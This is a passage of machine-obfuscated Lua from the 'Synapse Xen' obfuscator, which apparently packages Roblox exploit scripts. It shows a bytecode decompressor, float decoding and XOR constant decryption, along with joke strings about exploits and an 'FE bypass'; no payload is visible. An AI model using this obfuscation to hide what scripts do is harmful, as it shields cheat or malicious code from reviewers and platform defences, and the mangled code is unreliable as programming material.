SynapseXen_IiiIliIili=SynapseXen_lliIIiIlllIiIl(SynapseXen_iilllIIliiIiI,1,1)if SynapseXen_IiiIliIili=="u"then return SynapseXen_lliIIiIlllIiIl(SynapseXen_iilllIIliiIiI,2)elseif SynapseXen_IiiIliIili~="c"then error("Synapse Xen - Failed to verify bytecode. Please make sure your Lua implementation supports non-null terminated strings.")end;SynapseXen_iilllIIliiIiI=SynapseXen_lliIIiIlllIiIl(SynapseXen_iilllIIliiIiI,2)local SynapseXen_IIllIlilil=#SynapseXen_iilllIIliiIiI;local SynapseXen_iiilii={}local SynapseXen_iIIlilIliliilii,SynapseXen_IlIIliiIiililii=0,1;local SynapseXen_IiIIill={}local SynapseXen_IlIIlliIIiiliIilll=1;local SynapseXen_IlillIlIlllII=SynapseXen_lliIIiIlllIiIl(SynapseXen_iilllIIliiIiI,1,2)SynapseXen_IiIIill[SynapseXen_IlIIlliIIiiliIilll]=SynapseXen_lIlIlIllll[SynapseXen_IlillIlIlllII]or SynapseXen_iiilii[SynapseXen_IlillIlIlllII]SynapseXen_IlIIlliIIiiliIilll=SynapseXen_IlIIlliIIiiliIilll+1;for SynapseXen_ilIIiiIilllliliIIil=3,SynapseXen_IIllIlilil,2 do local SynapseXen_iIlIlIlliilIiIl=SynapseXen_lliIIiIlllIiIl(SynapseXen_iilllIIliiIiI,SynapseXen_ilIIiiIilllliliIIil,SynapseXen_ilIIiiIilllliliIIil+1)local SynapseXen_IIIiIiiIi=SynapseXen_lIlIlIllll[SynapseXen_IlillIlIlllII]or SynapseXen_iiilii[SynapseXen_IlillIlIlllII]if not SynapseXen_IIIiIiiIi then error("Synapse Xen - Failed to verify bytecode. Please make sure your Lua implementation supports non-null terminated strings.")end;local SynapseXen_lIIiIll=SynapseXen_lIlIlIllll[SynapseXen_iIlIlIlliilIiIl]or SynapseXen_iiilii[SynapseXen_iIlIlIlliilIiIl]if SynapseXen_lIIiIll then SynapseXen_IiIIill[SynapseXen_IlIIlliIIiiliIilll]=SynapseXen_lIIiIll;SynapseXen_IlIIlliIIiiliIilll=SynapseXen_IlIIlliIIiiliIilll+1;SynapseXen_iiilii,SynapseXen_iIIlilIliliilii,SynapseXen_IlIIliiIiililii=SynapseXen_llIiiiiiIlI(SynapseXen_IIIiIiiIi..SynapseXen_lliIIiIlllIiIl(SynapseXen_lIIiIll,1,1),SynapseXen_iiilii,SynapseXen_iIIlilIliliilii,SynapseXen_IlIIliiIiililii)else local SynapseXen_iIIiil=SynapseXen_IIIiIiiIi..SynapseXen_lliIIiIlllIiIl(SynapseXen_IIIiIiiIi,1,1)SynapseXen_IiIIill[SynapseXen_IlIIlliIIiiliIilll]=SynapseXen_iIIiil;SynapseXen_IlIIlliIIiiliIilll=SynapseXen_IlIIlliIIiiliIilll+1;SynapseXen_iiilii,SynapseXen_iIIlilIliliilii,SynapseXen_IlIIliiIiililii=SynapseXen_llIiiiiiIlI(SynapseXen_iIIiil,SynapseXen_iiilii,SynapseXen_iIIlilIliliilii,SynapseXen_IlIIliiIiililii)end;SynapseXen_IlillIlIlllII=SynapseXen_iIlIlIlliilIiIl end;return SynapseXen_illIIIIII(SynapseXen_IiIIill)end;local function SynapseXen_llilllIIliI(SynapseXen_lllIIllilIliiiIlIiI,SynapseXen_iIIlIIllIlIiil,SynapseXen_liiIIIl)if SynapseXen_liiIIIl then local SynapseXen_ilIIIIl=SynapseXen_lllIIllilIliiiIlIiI/2^(SynapseXen_iIIlIIllIlIiil-1)%2^(SynapseXen_liiIIIl-1-(SynapseXen_iIIlIIllIlIiil-1)+1)return SynapseXen_ilIIIIl-SynapseXen_ilIIIIl%1 else local SynapseXen_ilIIIilIillIll=2^(SynapseXen_iIIlIIllIlIiil-1)if SynapseXen_lllIIllilIliiiIlIiI%(SynapseXen_ilIIIilIillIll+SynapseXen_ilIIIilIillIll)>=SynapseXen_ilIIIilIillIll then return 1 else return 0 end end end;local function SynapseXen_iIiIIlliilliI()local SynapseXen_llIIIIlIliliIl=SynapseXen_lIIiIIiIilIIIl(2065694078,SynapseXen_IliiIilii)while true do if SynapseXen_llIIIIlIliliIl==SynapseXen_lIIiIIiIilIIIl(3216118616,SynapseXen_IliiIilii)then SynapseXen_illIIIIlilIIiIIlii=function(SynapseXen_IiIIIIilIiIiliIliIIi,SynapseXen_lIiiIiIlIililIlIIIl)return SynapseXen_lIIiIIiIilIIIl(SynapseXen_IiIIIIilIiIiliIliIIi-647,SynapseXen_lIiiIiIlIililIlIIIl-27031)-SynapseXen_lIIiIIiIilIIIl(3880910270,SynapseXen_IliiIilii)end;SynapseXen_llIIIIlIliliIl=SynapseXen_llIIIIlIliliIl+SynapseXen_lIIiIIiIilIIIl(3880903312,SynapseXen_IliiIilii)elseif SynapseXen_llIIIIlIliliIl==SynapseXen_lIIiIIiIilIIIl(3699803634,SynapseXen_llIIllllIlI[3])then SynapseXen_illIIIIlilIIiIIlii=function(SynapseXen_IiIIIIilIiIiliIliIIi,SynapseXen_lIiiIiIlIililIlIIIl)return SynapseXen_lIIiIIiIilIIIl(SynapseXen_IiIIIIilIiIiliIliIIi-33373,SynapseXen_lIiiIiIlIililIlIIIl+33794)+SynapseXen_lIIiIIiIilIIIl(3880892702,SynapseXen_IliiIilii)end;SynapseXen_llIIIIlIliliIl=SynapseXen_llIIIIlIliliIl+SynapseXen_lIIiIIiIilIIIl(884715601,SynapseXen_llIIllllIlI[6])elseif SynapseXen_llIIIIlIliliIl==SynapseXen_lIIiIIiIilIIIl(3452525724,SynapseXen_IliiIilii)then SynapseXen_illIIIIlilIIiIIlii=function(SynapseXen_IiIIIIilIiIiliIliIIi,SynapseXen_lIiiIiIlIililIlIIIl)return SynapseXen_lIIiIIiIilIIIl(SynapseXen_IiIIIIilIiIiliIliIIi-36649,SynapseXen_lIiiIiIlIililIlIIIl-47466)-SynapseXen_lIIiIIiIilIIIl(4129166503,SynapseXen_llIIllllIlI[3])end;SynapseXen_llIIIIlIliliIl=SynapseXen_llIIIIlIliliIl+SynapseXen_lIIiIIiIilIIIl(1359211279,SynapseXen_llIIllllIlI[5])elseif SynapseXen_llIIIIlIliliIl==SynapseXen_lIIiIIiIilIIIl(2509787783,SynapseXen_llIIllllIlI[3])then SynapseXen_illIIIIlilIIiIIlii=function(SynapseXen_IiIIIIilIiIiliIliIIi,SynapseXen_lIiiIiIlIililIlIIIl)return SynapseXen_lIIiIIiIilIIIl(SynapseXen_IiIIIIilIiIiliIliIIi-46729,SynapseXen_lIiiIiIlIililIlIIIl-9568)-SynapseXen_lIIiIIiIilIIIl(3880871892,SynapseXen_IliiIilii)end;SynapseXen_llIIIIlIliliIl=SynapseXen_lIIiIIiIilIIIl(SynapseXen_llIIIIlIliliIl,SynapseXen_lIIiIIiIilIIIl(790990958,SynapseXen_IliiIilii))elseif SynapseXen_llIIIIlIliliIl==SynapseXen_lIIiIIiIilIIIl(3452531538,SynapseXen_IliiIilii)then SynapseXen_illIIIIlilIIiIIlii=function(SynapseXen_IiIIIIilIiIiliIliIIi,SynapseXen_lIiiIiIlIililIlIIIl)return SynapseXen_lIIiIIiIilIIIl(SynapseXen_IiIIIIilIiIiliIliIIi-40711,SynapseXen_lIiiIiIlIililIlIIIl-7474)+SynapseXen_lIIiIIiIilIIIl(3880866671,SynapseXen_IliiIilii)end;SynapseXen_llIIIIlIliliIl=SynapseXen_llIIIIlIliliIl-SynapseXen_lIIiIIiIilIIIl(889709555,SynapseXen_llIIllllIlI[2])elseif SynapseXen_llIIIIlIliliIl==SynapseXen_lIIiIIiIilIIIl(1783857808,SynapseXen_llIIllllIlI[3])then SynapseXen_illIIIIlilIIiIIlii=function(SynapseXen_IiIIIIilIiIiliIliIIi,SynapseXen_lIiiIiIlIililIlIIIl)return SynapseXen_lIIiIIiIilIIIl(SynapseXen_IiIIIIilIiIiliIliIIi-13237,SynapseXen_lIiiIiIlIililIlIIIl-16289)-SynapseXen_lIIiIIiIilIIIl(3880877540,SynapseXen_IliiIilii)end;SynapseXen_llIIIIlIliliIl=SynapseXen_llIIIIlIliliIl-SynapseXen_lIIiIIiIilIIIl(2073290459,SynapseXen_llIIllllIlI[4])elseif SynapseXen_llIIIIlIliliIl==SynapseXen_lIIiIIiIilIIIl(4255597841,SynapseXen_IliiIilii)then SynapseXen_illIIIIlilIIiIIlii=function(SynapseXen_IiIIIIilIiIiliIliIIi,SynapseXen_lIiiIiIlIililIlIIIl)return SynapseXen_lIIiIIiIilIIIl(SynapseXen_IiIIIIilIiIiliIliIIi-21775,SynapseXen_lIiiIiIlIililIlIIIl-21184)+SynapseXen_lIIiIIiIilIIIl(3880891592,SynapseXen_IliiIilii)end;SynapseXen_llIIIIlIliliIl=SynapseXen_lIIiIIiIilIIIl(SynapseXen_llIIIIlIliliIl,SynapseXen_lIIiIIiIilIIIl(4247509557,SynapseXen_llIIllllIlI[7]))elseif SynapseXen_llIIIIlIliliIl==SynapseXen_lIIiIIiIilIIIl(1285813187,SynapseXen_IliiIilii)then SynapseXen_illIIIIlilIIiIIlii=function(SynapseXen_IiIIIIilIiIiliIliIIi,SynapseXen_lIiiIiIlIililIlIIIl)return SynapseXen_lIIiIIiIilIIIl(SynapseXen_IiIIIIilIiIiliIliIIi+11643,SynapseXen_lIiiIiIlIililIlIIIl+2251)+SynapseXen_lIIiIIiIilIIIl(3880862729,SynapseXen_IliiIilii)end;SynapseXen_llIIIIlIliliIl=SynapseXen_lIIiIIiIilIIIl(SynapseXen_llIIIIlIliliIl,SynapseXen_lIIiIIiIilIIIl(2290241763,SynapseXen_llIIllllIlI[4]))elseif SynapseXen_llIIIIlIliliIl==SynapseXen_lIIiIIiIilIIIl(2065474211,SynapseXen_IliiIilii)then SynapseXen_illIIIIlilIIiIIlii=function(SynapseXen_IiIIIIilIiIiliIliIIi,SynapseXen_lIiiIiIlIililIlIIIl)return SynapseXen_lIIiIIiIilIIIl(SynapseXen_IiIIIIilIiIiliIliIIi+27333,SynapseXen_lIiiIiIlIililIlIIIl+19114)+SynapseXen_lIIiIIiIilIIIl(4129205584,SynapseXen_llIIllllIlI[3])end;SynapseXen_llIIIIlIliliIl=SynapseXen_lIIiIIiIilIIIl(SynapseXen_llIIIIlIliliIl,SynapseXen_lIIiIIiIilIIIl(848179521,SynapseXen_llIIllllIlI[7]))elseif SynapseXen_llIIIIlIliliIl==SynapseXen_lIIiIIiIilIIIl(404037526,SynapseXen_llIIllllIlI[4])then SynapseXen_illIIIIlilIIiIIlii=function(SynapseXen_IiIIIIilIiIiliIliIIi,SynapseXen_lIiiIiIlIililIlIIIl)return SynapseXen_lIIiIIiIilIIIl(SynapseXen_IiIIIIilIiIiliIliIIi+28492,SynapseXen_lIiiIiIlIililIlIIIl+18840)-SynapseXen_lIIiIIiIilIIIl(884682052,SynapseXen_llIIllllIlI[6])end;SynapseXen_llIIIIlIliliIl=SynapseXen_llIIIIlIliliIl-SynapseXen_lIIiIIiIilIIIl(3880891381,SynapseXen_IliiIilii)elseif SynapseXen_llIIIIlIliliIl==SynapseXen_lIIiIIiIilIIIl(3452514952,SynapseXen_IliiIilii)then return elseif SynapseXen_llIIIIlIliliIl==SynapseXen_lIIiIIiIilIIIl(3954589744,SynapseXen_llIIllllIlI[1])then SynapseXen_illIIIIlilIIiIIlii=function(SynapseXen_IiIIIIilIiIiliIliIIi,SynapseXen_lIiiIiIlIililIlIIIl)return SynapseXen_lIIiIIiIilIIIl(SynapseXen_IiIIIIilIiIiliIliIIi+21630,SynapseXen_lIiiIiIlIililIlIIIl+26106)-SynapseXen_lIIiIIiIilIIIl(1359192910,SynapseXen_llIIllllIlI[5])end;SynapseXen_llIIIIlIliliIl=SynapseXen_llIIIIlIliliIl+SynapseXen_lIIiIIiIilIIIl(2073267722,SynapseXen_llIIllllIlI[4])elseif SynapseXen_llIIIIlIliliIl==SynapseXen_lIIiIIiIilIIIl(3452508761,SynapseXen_IliiIilii)then SynapseXen_illIIIIlilIIiIIlii=function(SynapseXen_IiIIIIilIiIiliIliIIi,SynapseXen_lIiiIiIlIililIlIIIl)return SynapseXen_lIIiIIiIilIIIl(SynapseXen_IiIIIIilIiIiliIliIIi+32039,SynapseXen_lIiiIiIlIililIlIIIl+10326)+SynapseXen_lIIiIIiIilIIIl(4129191036,SynapseXen_llIIllllIlI[3])end;SynapseXen_llIIIIlIliliIl=SynapseXen_llIIIIlIliliIl-SynapseXen_lIIiIIiIilIIIl(3880887987,SynapseXen_IliiIilii)elseif SynapseXen_llIIIIlIliliIl==SynapseXen_lIIiIIiIilIIIl(166175706,SynapseXen_llIIllllIlI[5])then SynapseXen_illIIIIlilIIiIIlii=function(SynapseXen_IiIIIIilIiIiliIliIIi,SynapseXen_lIiiIiIlIililIlIIIl)return SynapseXen_lIIiIIiIilIIIl(SynapseXen_IiIIIIilIiIiliIliIIi-7103,SynapseXen_lIiiIiIlIililIlIIIl+46636)+SynapseXen_lIIiIIiIilIIIl(3241032772,SynapseXen_llIIllllIlI[1])end;SynapseXen_llIIIIlIliliIl=SynapseXen_lIIiIIiIilIIIl(SynapseXen_llIIIIlIliliIl,SynapseXen_lIIiIIiIilIIIl(2201781987,SynapseXen_llIIllllIlI[1]))elseif SynapseXen_llIIIIlIliliIl==SynapseXen_lIIiIIiIilIIIl(2065694078,SynapseXen_IliiIilii)then SynapseXen_illIIIIlilIIiIIlii=function(SynapseXen_IiIIIIilIiIiliIliIIi,SynapseXen_lIiiIiIlIililIlIIIl)return SynapseXen_lIIiIIiIilIIIl(SynapseXen_IiIIIIilIiIiliIliIIi+5999,SynapseXen_lIiiIiIlIililIlIIIl+32281)+SynapseXen_lIIiIIiIilIIIl(4129196994,SynapseXen_llIIllllIlI[3])end;SynapseXen_llIIIIlIliliIl=SynapseXen_llIIIIlIliliIl-SynapseXen_lIIiIIiIilIIIl(3880890532,SynapseXen_IliiIilii)end end end;local function SynapseXen_iiilIliilll(SynapseXen_ilIIiiIIilil)local SynapseXen_IiliilllIliilliiil=1;local SynapseXen_IllliIliiliI;local SynapseXen_iIiIilIIliiIi;local function SynapseXen_IIiliilIlliiIilI()local SynapseXen_liIiIiiIiIliliIlIliI=SynapseXen_iIiilll(SynapseXen_ilIIiiIIilil,SynapseXen_IiliilllIliilliiil,SynapseXen_IiliilllIliilliiil)SynapseXen_IiliilllIliilliiil=SynapseXen_IiliilllIliilliiil+1;return SynapseXen_liIiIiiIiIliliIlIliI end;local function SynapseXen_ililiiII()local SynapseXen_IliIliilIIIIIiilii,SynapseXen_IiIIIIilIiIiliIliIIi,SynapseXen_lIiiIiIlIililIlIIIl,SynapseXen_illllIIiliiIii=SynapseXen_iIiilll(SynapseXen_ilIIiiIIilil,SynapseXen_IiliilllIliilliiil,SynapseXen_IiliilllIliilliiil+3)SynapseXen_IiliilllIliilliiil=SynapseXen_IiliilllIliilliiil+4;return SynapseXen_illllIIiliiIii*16777216+SynapseXen_lIiiIiIlIililIlIIIl*65536+SynapseXen_IiIIIIilIiIiliIliIIi*256+SynapseXen_IliIliilIIIIIiilii end;local function SynapseXen_Illlii()return SynapseXen_ililiiII()*4294967296+SynapseXen_ililiiII()end;local function SynapseXen_liliilil()local SynapseXen_IillllIli=SynapseXen_iIlIiIlIil(SynapseXen_ililiiII(),SynapseXen_iIIIIiiIll[3048097686]or(function(...)local SynapseXen_iliiIlill="pain is gonna use the backspace method on xen"local SynapseXen_lliil=SynapseXen_illIIIIlilIIiIIlii(1466625502,2493250383)local SynapseXen_IiliiliiiiiIililIlIl={...}for SynapseXen_ilIIiiIilllliliIIil,SynapseXen_ilIIii in pairs(SynapseXen_IiliiliiiiiIililIlIl)do local SynapseXen_llIIilliilIll;local SynapseXen_IiiIliiIllliiIlIIl=type(SynapseXen_ilIIii)if SynapseXen_IiiIliiIllliiIlIIl=="number"then SynapseXen_llIIilliilIll=SynapseXen_ilIIii elseif SynapseXen_IiiIliiIllliiIlIIl=="string"then SynapseXen_llIIilliilIll=SynapseXen_ilIIii:len()elseif SynapseXen_IiiIliiIllliiIlIIl=="table"then SynapseXen_llIIilliilIll=SynapseXen_illIIIIlilIIiIIlii(1457444311,2837511557)end;SynapseXen_lliil=SynapseXen_lliil+SynapseXen_llIIilliilIll end;SynapseXen_iIIIIiiIll[3048097686]=SynapseXen_lIIiIIiIilIIIl(SynapseXen_lIIiIIiIilIIIl(2835416675,SynapseXen_lliil),SynapseXen_lIIiIIiIilIIIl(2111124881,SynapseXen_IliiIilii))-string.len(SynapseXen_iliiIlill)-#{2011192335}return SynapseXen_iIIIIiiIll[3048097686]end)("lilIlllilliIllilli",8188,1740,448,"lIlIiiIIilIIlIIlIl","iIIIiIlliIlIIiilIIl",10069,"iiIlIliliili","iii","lilIIilillllIiIlill"))local SynapseXen_IillIIIIIlIlIllllIi=SynapseXen_iIlIiIlIil(SynapseXen_ililiiII(),SynapseXen_iIIIIiiIll[3288592837]or(function(...)local SynapseXen_iliiIlill="so if you'we nyot awawe of expwoiting by this point, you've pwobabwy been wiving undew a wock that the pionyeews used to wide fow miwes. wobwox is often seen as an expwoit-infested gwound by most fwom the suwface, awthough this isn't the case."local SynapseXen_lliil=SynapseXen_illIIIIlilIIiIIlii(2410122718,36378197)local SynapseXen_IiliiliiiiiIililIlIl={...}for SynapseXen_ilIIiiIilllliliIIil,SynapseXen_ilIIii in pairs(SynapseXen_IiliiliiiiiIililIlIl)do local SynapseXen_llIIilliilIll;local SynapseXen_IiiIliiIllliiIlIIl=type(SynapseXen_ilIIii)if SynapseXen_IiiIliiIllliiIlIIl=="number"then SynapseXen_llIIilliilIll=SynapseXen_ilIIii elseif SynapseXen_IiiIliiIllliiIlIIl=="string"then SynapseXen_llIIilliilIll=SynapseXen_ilIIii:len()elseif SynapseXen_IiiIliiIllliiIlIIl=="table"then SynapseXen_llIIilliilIll=SynapseXen_illIIIIlilIIiIIlii(474407902,3820560348)end;SynapseXen_lliil=SynapseXen_lliil-SynapseXen_llIIilliilIll end;SynapseXen_iIIIIiiIll[3288592837]=SynapseXen_lIIiIIiIilIIIl(SynapseXen_lIIiIIiIilIIIl(4020781438,SynapseXen_lliil),SynapseXen_lIIiIIiIilIIIl(2412364714,SynapseXen_IliiIilii))-string.len(SynapseXen_iliiIlill)-#{3247130113,1897542704,4094801553,480858656,526650341}return SynapseXen_iIIIIiiIll[3288592837]end)("ilIIlIilIlIiIiiIlil","i"))local SynapseXen_IlIiIliiiI=1;local SynapseXen_IiIIliilllIIIli=SynapseXen_llilllIIliI(SynapseXen_IillIIIIIlIlIllllIi,1,20)*2^32+SynapseXen_IillllIli;local SynapseXen_lliiilI=SynapseXen_llilllIIliI(SynapseXen_IillIIIIIlIlIllllIi,21,31)local SynapseXen_lIIlIIiIlIiIli=(-1)^SynapseXen_llilllIIliI(SynapseXen_IillIIIIIlIlIllllIi,32)if SynapseXen_lliiilI==0 then if SynapseXen_IiIIliilllIIIli==0 then return SynapseXen_lIIlIIiIlIiIli*0 else SynapseXen_lliiilI=1;SynapseXen_IlIiIliiiI=0 end elseif SynapseXen_lliiilI==2047 then if SynapseXen_IiIIliilllIIIli==0 then return SynapseXen_lIIlIIiIlIiIli*1/0 else return SynapseXen_lIIlIIiIlIiIli*0/0 end end;return math.ldexp(SynapseXen_lIIlIIiIlIiIli,SynapseXen_lliiilI-1023)*(SynapseXen_IlIiIliiiI+SynapseXen_IiIIliilllIIIli/2^52)end;local function SynapseXen_IlIIIIiilliIlIli(SynapseXen_IIilIillIIIiiIIIl)local SynapseXen_iiIlilIllliI;if SynapseXen_IIilIillIIIiiIIIl then SynapseXen_iiIlilIllliI=SynapseXen_lliIIiIlllIiIl(SynapseXen_ilIIiiIIilil,SynapseXen_IiliilllIliilliiil,SynapseXen_IiliilllIliilliiil+SynapseXen_IIilIillIIIiiIIIl-1)SynapseXen_IiliilllIliilliiil=SynapseXen_IiliilllIliilliiil+SynapseXen_IIilIillIIIiiIIIl else SynapseXen_IIilIillIIIiiIIIl=SynapseXen_IllliIliiliI()if SynapseXen_IIilIillIIIiiIIIl==0 then return""end;SynapseXen_iiIlilIllliI=SynapseXen_lliIIiIlllIiIl(SynapseXen_ilIIiiIIilil,SynapseXen_IiliilllIliilliiil,SynapseXen_IiliilllIliilliiil+SynapseXen_IIilIillIIIiiIIIl-1)SynapseXen_IiliilllIliilliiil=SynapseXen_IiliilllIliilliiil+SynapseXen_IIilIillIIIiiIIIl end;return SynapseXen_iiIlilIllliI end;local function SynapseXen_ilillIlIlIlIlIli(SynapseXen_iiIlilIllliI)local SynapseXen_ilIIIIl={}for SynapseXen_ilIIiiIilllliliIIil=1,#SynapseXen_iiIlilIllliI do local SynapseXen_llIiIiIliI=SynapseXen_iiIlilIllliI:sub(SynapseXen_ilIIiiIilllliliIIil,SynapseXen_ilIIiiIilllliliIIil)SynapseXen_ilIIIIl[#SynapseXen_ilIIIIl+1]=string.char(SynapseXen_lIIiIIiIilIIIl(string.byte(SynapseXen_llIiIiIliI),SynapseXen_iIIIIiiIll[1004528272]or(function()local SynapseXen_iliiIlill="SYNAPSE XEN [FE BYPASS] [BETTER THEN LURAPH] [AMAZING] OMG OMG OMG !!!!!!"SynapseXen_iIIIIiiIll[1004528272]=SynapseXen_lIIiIIiIilIIIl(SynapseXen_illIIIIlilIIiIIlii(2669830260,1996699252),SynapseXen_lIIiIIiIilIIIl(2477857577,SynapseXen_llIIllllIlI[4]))-string.len(SynapseXen_iliiIlill)-#{2108141660,3186873651,3841967422,2021091888,2891887824}return SynapseXen_iIIIIiiIll[1004528272]end)()))end;return table.concat(SynapseXen_ilIIIIl)end;local function SynapseXen_lIIIlIllIll()local SynapseXen_ilIIIiIIl={}local SynapseXen_iiiIIIiIIlI={}local SynapseXen_iIlliiillI={}local SynapseXen_iiIiIII={[SynapseXen_iIIIIiiIll[3949058139]or(function(...)local SynapseXen_iliiIlill="sponsored by ironbrew, jk xen is better"local SynapseXen_lliil=SynapseXen_illIIIIlilIIiIIlii(3765702986,2330699258)local SynapseXen_IiliiliiiiiIililIlIl={...}for SynapseXen_ilIIiiIilllliliIIil,SynapseXen_ilIIii in pairs(SynapseXen_IiliiliiiiiIililIlIl)do local SynapseXen_llIIilliilIll;local SynapseXen_IiiIliiIllliiIlIIl=type(SynapseXen_ilIIii)if SynapseXen_IiiIliiIllliiIlIIl=="number"then SynapseXen_llIIilliilIll=SynapseXen_ilIIii elseif SynapseXen_IiiIliiIllliiIlIIl=="string"then SynapseXen_llIIilliilIll=SynapseXen_ilIIii:len()elseif SynapseXen_IiiIliiIllliiIlIIl=="table"then SynapseXen_llIIilliilIll=SynapseXen_illIIIIlilIIiIIlii(4062694205,232264639)end;SynapseXen_lliil=SynapseXen_lliil+SynapseXen_llIIilliilIll end;SynapseXen_iIIIIiiIll[3949058139]=SynapseXen_lIIiIIiIilIIIl(SynapseXen_lIIiIIiIilIIIl(2080115543,SynapseXen_lliil),SynapseXen_lIIiIIiIilIIIl(2301477881,SynapseXen_IliiIilii))-string.len(SynapseXen_iliiIlill)-#{1750576328,2358986481,2641618807,3999146407,2324983478,674668817}return SynapseXen_iIIIIiiIll[3949058139]end)({},"ilIiIIlIliiIIllIil","IllililiIi",{},"lIiilliillIi","iIIIili",6495,11166,"lllIlililliIii")]=SynapseXen_ilIIIiIIl,[SynapseXen_iIIIIiiIll[494538311]or(function()local SynapseXen_iliiIlill="this is a christian obfuscator, no cursing allowed in our scripts"SynapseXen_iIIIIiiIll[494538311]=SynapseXen_lIIiIIiIilIIIl(SynapseXen_illIIIIlilIIiIIlii(1177280950,3421171883),SynapseXen_lIIiIIiIilIIIl(1812453119,SynapseXen_llIIllllIlI[1]))-string.len(SynapseXen_iliiIlill)-#{283701196,2099695827,2604174574,1480273764,3157909769,1578702942,1696652068,1937885278}return SynapseXen_iIIIIiiIll[494538311]end)()]=SynapseXen_iIlliiillI,[SynapseXen_iIIIIiiIll[4028302266]or(function()local SynapseXen_iliiIlill="wait for someone on devforum to say they are gonna deobfuscate this"SynapseXen_iIIIIiiIll[4028302266]=SynapseXen_lIIiIIiIilIIIl(SynapseXen_illIIIIlilIIiIIlii(3766530902,2497484390),SynapseXen_lIIiIIiIilIIIl(1448011205,SynapseXen_llIIllllIlI[6]))-string.len(SynapseXen_iliiIlill)-#{3520358665,2240056417,3205540183}return SynapseXen_iIIIIiiIll[4028302266]end)()]=SynapseXen_iiiIIIiIIlI}for SynapseXen_ilIiIlii=1,SynapseXen_lIIiIIiIilIIIl(SynapseXen_iIiIilIIliiIi(),SynapseXen_iIIIIiiIll[2109003792]or(function(...)local SynapseXen_iliiIlill="level 1 crook = luraph, level 100 boss = xen"local SynapseXen_lliil=SynapseXen_illIIIIlilIIiIIlii(2927361991,3156054335)local SynapseXen_IiliiliiiiiIililIlIl={...}for SynapseXen_ilIIiiIilllliliIIil,SynapseXen_ilIIii in pairs(SynapseXen_IiliiliiiiiIililIlIl)do local SynapseXen_llIIilliilIll;local SynapseXen_IiiIliiIllliiIlIIl=type(SynapseXen_ilIIii)if SynapseXen_IiiIliiIllliiIlIIl=="number"then SynapseXen_llIIilliilIll=SynapseXen_ilIIii elseif SynapseXen_IiiIliiIllliiIlIIl=="string"then SynapseXen_llIIilliilIll=SynapseXen_ilIIii:len()elseif SynapseXen_IiiIliiIllliiIlIIl=="table"then SynapseXen_llIIilliilIll=SynapseXen_illIIIIlilIIiIIlii(4001295876,293669570)end;SynapseXen_lliil=SynapseXen_lliil-SynapseXen_llIIilliilIll end;SynapseXen_iIIIIiiIll[2109003792]=SynapseXen_lIIiIIiIilIIIl(SynapseXen_lIIiIIiIilIIIl(642714053,SynapseXen_lliil),SynapseXen_lIIiIIiIilIIIl(2282286791,SynapseXen_IliiIilii))-string.len(SynapseXen_iliiIlill)-#{3897284893,4160261239,469947693}return SynapseXen_iIIIIiiIll[2109003792]end)("III",13917,{}))do SynapseXen_IIiliilIlliiIilI()local SynapseXen_lIiilIlllIIiiilllil=SynapseXen_lIIiIIiIilIIIl(SynapseXen_ililiiII(),SynapseXen_iIIIIiiIll[1278934960]or(function()local SynapseXen_iliiIlill="i'm intercommunication about the most nonecclesiastical dll exploits for esp. they only characterization objects with a antepatriarchal in the geistesgeschichte for the esp."SynapseXen_iIIIIiiIll[1278934960]=SynapseXen_lIIiIIiIilIIIl(SynapseXen_illIIIIlilIIiIIlii(3739095106,3130919228),SynapseXen_lIIiIIiIilIIIl(3821033577,SynapseXen_IliiIilii))-string.len(SynapseXen_iliiIlill)-#{3609108705,1697298285,944573785,3865215769,4252894133}return SynapseXen_iIIIIiiIll[1278934960]end)())local SynapseXen_lIliilill=SynapseXen_IIiliilIlliiIilI()SynapseXen_ililiiII()local SynapseXen_llIlIlIlIIIilIIlilii=SynapseXen_IIiliilIlliiIilI()local SynapseXen_iilIlIlIII={[476925695]=SynapseXen_lIiilIlllIIiiilllil,[544186938]=SynapseXen_lIliilill,[184010083]=SynapseXen_llilllIIliI(SynapseXen_lIiilIlllIIiiilllil,1,6),[1055476718]=SynapseXen_llilllIIliI(SynapseXen_lIiilIlllIIiiilllil,7,14)}if SynapseXen_llIlIlIlIIIilIIlilii==(SynapseXen_iIIIIiiIll[1649135692]or(function()local SynapseXen_iliiIlill="xen doesn't come with instance caching, sorry superskater"SynapseXen_iIIIIiiIll[1649135692]=SynapseXen_lIIiIIiIilIIIl(SynapseXen_illIIIIlilIIiIIlii(3493370571,3670270521),SynapseXen_lIIiIIiIilIIIl(3350791981,SynapseXen_llIIllllIlI[7]))-string.len(SynapseXen_iliiIlill)-#{750300921,3821966035,2953343682,4167888579,708366947,2924603398,1375487166,3660771681}return SynapseXen_iIIIIiiIll[1649135692]end)())then SynapseXen_iilIlIlIII[954173160]=SynapseXen_llilllIIliI(SynapseXen_lIiilIlllIIiiilllil,24,32)SynapseXen_iilIlIlIII[1102161443]=SynapseXen_llilllIIliI(SynapseXen_lIiilIlllIIiiilllil,15,23)elseif SynapseXen_llIlIlIlIIIilIIlilii==(SynapseXen_iIIIIiiIll[53867487]or(function()local SynapseXen_iliiIlill="sometimes it be like that"SynapseXen_iIIIIiiIll[53867487]=SynapseXen_lIIiIIiIilIIIl(SynapseXen_illIIIIlilIIiIIlii(736652478,2205876231),SynapseXen_lIIiIIiIilIIIl(4187954238,SynapseXen_llIIllllIlI[5]))-string.len(SynapseXen_iliiIlill)-#{333041094,2474112481,2537682260,3527502370,1307267530}return SynapseXen_iIIIIiiIll[53867487]end)())then SynapseXen_iilIlIlIII[2061944757]=SynapseXen_llilllIIliI(SynapseXen_lIiilIlllIIiiilllil,15,32)elseif SynapseXen_llIlIlIlIIIilIIlilii==(SynapseXen_iIIIIiiIll[1673501406]or(function(...)local SynapseXen_iliiIlill="this is so sad, alexa play ripull.mp4"local SynapseXen_lliil=SynapseXen_illIIIIlilIIiIIlii(2132263663,2410041431)local SynapseXen_IiliiliiiiiIililIlIl={...}for SynapseXen_ilIIiiIilllliliIIil,SynapseXen_ilIIii in pairs(SynapseXen_IiliiliiiiiIililIlIl)do local SynapseXen_llIIilliilIll;local SynapseXen_IiiIliiIllliiIlIIl=type(SynapseXen_ilIIii)if SynapseXen_IiiIliiIllliiIlIIl=="number"then SynapseXen_llIIilliilIll=SynapseXen_ilIIii elseif SynapseXen_IiiIliiIllliiIlIIl=="string"then SynapseXen_llIIilliilIll=SynapseXen_ilIIii:len()elseif SynapseXen_IiiIliiIllliiIlIIl=="table"then SynapseXen_llIIilliilIll=SynapseXen_illIIIIlilIIiIIlii(512496541,3782472081)end;SynapseXen_lliil=SynapseXen_lliil+SynapseXen_llIIilliilIll 